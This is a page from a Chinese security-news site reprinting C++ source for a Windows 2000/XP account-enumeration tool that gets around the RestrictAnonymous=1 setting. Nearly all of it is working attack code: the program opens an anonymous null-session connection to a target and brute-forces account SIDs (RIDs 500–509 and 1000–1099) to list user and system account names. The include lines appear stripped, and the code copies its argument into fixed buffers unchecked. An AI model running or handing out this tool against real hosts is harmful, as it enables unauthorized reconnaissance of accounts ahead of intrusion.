首页 > 安全资讯 >

突破“RestrictAnonymous=1”限制枚举帐号的代码

04-10-16

 ////////////////////////////////////////////////////////////////////////////////// // Enum users// // File : Enum.cpp// Comment : For win2k and XP(proserveradv)// // // Create by : Refdom// Email : refdom@263.net// H

 ////////////////////////////////////////////////////////////////////////////////
//
// Enum users
//
// File : Enum.cpp
// Comment : For win2k and XP(proserveradv)
//
//
// Create by : Refdom
// Email : refdom@263.net
// Home Page : www.opengram.com
//
// If you modify the code, or add more functions, please email me a copy.
//
////////////////////////////////////////////////////////////////////////////////


#include
#include
#include
#include

#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Netapi32.lib")
#pragma comment (lib, "Mpr.lib")

void MyPrintSidInfo(PSID, PSID_NAME_USE);
int MyConnectServer(LPNETRESOURCE, LPCTSTR, LPCTSTR, DWORD, LPTSTR);
int MyDisConnectServer(LPCTSTR, DWORD, BOOL);

int main (int argc, char* argv[])
{
int nRetCode, nSubAuthorityCount, i;
DWORD nSize;
int dwSubAuthority[8];
char szIpc[50] = "";
char szServer[30] = "";
PSID pSid;
PSID pNewSid;
LPTSTR lpDomainName;
LPTSTR lpUserName;
PSID_NAME_USE peUse;
PSID_IDENTIFIER_AUTHORITY pSIA;

nSize = 1024;

pSid = (PSID) LocalAlloc(LPTR, 1024);
lpDomainName = (LPTSTR) LocalAlloc(LPTR, 1024);
peUse = (PSID_NAME_USE) LocalAlloc(LPTR, 1024);
lpUserName = (LPTSTR) LocalAlloc(LPTR, 1024);

sprintf (szIpc, "%s", argv[1]);
sprintf (szServer, "%s", argv[1]);
NETRESOURCE NET;

if (argc<2)
return 0;

NET.lpLocalName = NULL;
NET.lpRemoteName = szIpc;
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;

printf ("Connecting %s...", szIpc);
nRetCode = MyConnectServer(&NET, "", "", 0, szIpc);
if (nRetCode)
{
printf ("Failed! ");
return 0;
}
else
{
printf ("Successfully! ");
}

if (!LookupAccountName(argv[1], "guest", pSid, &nSize, lpDomainName, &nSize, peUse))
{
printf ("Lookup failed!%d ", GetLastError());
goto End;
}

printf ("DomainName:%s ", lpDomainName);
pSIA = GetSidIdentifierAuthority(pSid);
MyPrintSidInfo(pSid, peUse);
nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
for (i = 0; i< nSubAuthorityCount; i++)
{
dwSubAuthority[i] = (int) *GetSidSubAuthority(pSid, i);
}

//lookup system account
for (i = 0; i < 10; i++)
{
nSize = 1024;
if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
dwSubAuthority[0], dwSubAuthority[1],
dwSubAuthority[2], dwSubAuthority[3],
(500 + i), dwSubAuthority[5],
dwSubAuthority[6], dwSubAuthority[7],
&pNewSid))
{
printf ("Error SID!%d ",GetLastError());
goto End;
}
if (!LookupAccountSid(argv[1], pNewSid, lpUserName, &nSize,
lpDomainName, &nSize, peUse))
{
printf ("Lookup error!%d ", GetLastError());
break;
}
else
{
printf ("UserName: %s ", lpUserName);
MyPrintSidInfo(pNewSid, peUse);
}
FreeSid(pNewSid);
}

//look up user account
for (i = 0; i < 100; i++)
{
FreeSid(pNewSid);
nSize = 1024;
if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
dwSubAuthority[0], dwSubAuthority[1],
dwSubAuthority[2], dwSubAuthority[3],
(1000 + i), dwSubAuthority[5],
dwSubAuthority[6], dwSubAuthority[7],
&pNewSid))
{
printf ("Error SID!%d ",GetLastError());
goto End;
}
if (!LookupAccountSid(argv[1], pNewSid, lpUserName, &nSize,
lpDomainName, &nSize, peUse))
{
}
else
{
printf ("UserName: %s ", lpUserName);
MyPrintSidInfo(pNewSid, peUse);
}
}

End:

FreeSid(pNewSid);
FreeSid(pSid);
LocalFree(lpDomainName);
LocalFree(peUse);
Sleep (100);
printf ("Disconnecting server...");
if (MyDisConnectServer(szIpc, CONNECT_UPDATE_PROFILE, TRUE))
printf ("Failed!%d ", nRetCode);
else
printf ("Successfully! ");
return 0;
}

void MyPrintSidInfo(PSID pSid, PSID_NAME_USE peUse)
{
int i;
int nSubAuthorityCount;
PSID_IDENTIFIER_AUTHORITY pSIA;

pSIA = GetSidIdentifierAuthority(pSid);
printf (" SID:");
if (pSIA->Value[0] == 0 && pSIA->Value[1] == 0)
{
ULONG ulSIA = (ULONG)(pSIA->Value[5] ) +
(ULONG)(pSIA->Value[4] << 8) +
(ULONG)(pSIA->Value[3] << 16) +
(ULONG)(pSIA->Value[2] << 24);
printf ("S-1-%d",ulSIA);
}
else
cout << hex << (USHORT)pSIA->Value[0]
<< (USHORT)pSIA->Value[1]
<< (USHORT)pSIA->Value[2]
<< (USHORT)pSIA->Value[3]
<< (USHORT)pSIA->Value[4]
<< (USHORT)pSIA->Value[5]
<< dec;
nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
for (i = 0; i< nSubAuthorityCount; i++)
{
printf ("-%d", *GetSidSubAuthority(pSid, i));
}

printf (" SubAuthorityCount:%d ", nSubAuthorityCount);
printf (" AccountType:");
switch (*peUse)
{
case SidTypeUser:
printf ("User");
break;
case SidTypeGroup:
printf ("Group account");
break;
case SidTypeDomain:
printf ("Domain account");
break;
case SidTypeAlias:
printf ("Alias account");
break;
case SidTypeWellKnownGroup:
printf ("Well-known group");
break;
case SidTypeDeletedAccount:
printf ("Deleted account");
break;
case SidTypeInvalid:
printf ("Invalid account");
break;
case SidTypeUnknown:
printf ("Unkown account");
break;
case SidTypeComputer:
printf ("Computer account");
break;
}
printf (" ");

return;
}

int MyConnectServer(LPNETRESOURCE lpNetResource,
LPCTSTR lpPassword,
LPCTSTR lpUserName,
DWORD dwFlags,
LPTSTR lpRemoteName)
{
int nRetCode;
int nReturnCode = 0;

//cancel the connect first
nRetCode = WNetCancelConnection2(lpRemoteName, dwFlags, TRUE);

//connect remote server
nRetCode = WNetAddConnection2(lpNetResource, lpPassword, lpUserName, dwFlags);
if (nRetCode != NO_ERROR)
{
if (nRetCode == ERROR_ALREADY_ASSIGNED || nRetCode == ERROR_DEVICE_ALREADY_REMEMBERED)
{
nReturnCode = GetLastError();
}
else
{
switch (nRetCode)
{
case ERROR_ACCESS_DENIED:
nReturnCode = GetLastError();
break;
case ERROR_BAD_NET_NAME:
nReturnCode = GetLastError();
break;
default:
nReturnCode = GetLastError();
break;
}
}
}
return nReturnCode;
}

int MyDisConnectServer(LPCTSTR lpName,
DWORD dwFlag,
BOOL bForce)
{
int nReturnCode = 0;
int nRetCode;
nRetCode = WNetCancelConnection2(lpName, dwFlag, bForce);
if (nRetCode != NO_ERROR)
{
nReturnCode = GetLastError();
}
return nReturnCode;
}


 

相关文章
最新文章
热点推荐